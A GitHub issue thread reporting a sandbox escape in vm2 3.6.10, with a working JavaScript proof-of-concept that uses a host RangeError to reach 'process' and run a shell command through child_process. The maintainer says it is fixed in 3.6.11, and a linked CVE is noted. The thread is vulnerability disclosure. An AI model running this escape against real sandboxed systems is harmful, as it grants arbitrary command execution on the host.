Breakout in v3.6.10 via Maximum call stack size exceeded RangeError

[XmiliaH]

It is possible to almost anywhere generate a RangeError: Maximum call stack size exceeded. Sometimes the RangeError will be a host RangeError which is not Contextified.
I tried to make the code as stable as possible.

"use strict";
const {VM} = require('vm2');
const untrusted = `
const f = Buffer.prototype.write;
const ft = {
		length: 10,
		utf8Write(){
			
		}
}
function r(i){
	var x = 0;
	try{
		x = r(i);
	}catch(e){}
	if(typeof(x)!=='number')
		return x;
	if(x!==i)
		return x+1;
	try{
		f.call(ft);
	}catch(e){
		return e;
	}
	return null;
}
var i=1;
while(1){
	try{
		i=r(i).constructor.constructor("return process")();
		break;
	}catch(x){
		i++;
	}
}
i.mainModule.require("child_process").execSync("whoami").toString()
`;
try{
	console.log(new VM().run(untrusted));
}catch(x){
	console.log(x);
}

I used 11.8.0.

[patriksimek]

Thanks for the report. Fixed in 3.6.11.

[JLLeitschuh]

@XmiliaH Just a heads up, your POC worked against another project as well called Safer-Eval and had the following CVE number assigned to it: CVE-2019-10769. Nice finding!

https://twitter.com/JLLeitschuh/status/1204106820115222529?s=20

Full disclosure:
https://gist.github.com/JLLeitschuh/609bb2efaff22ed84fe182cf574c023a

[XmiliaH]

You can break out far easier commenthol/safer-eval#10. And to get a host exceptions one can just supply a invalid argument to get a exception. Using maximum call stack RangeError is overkill.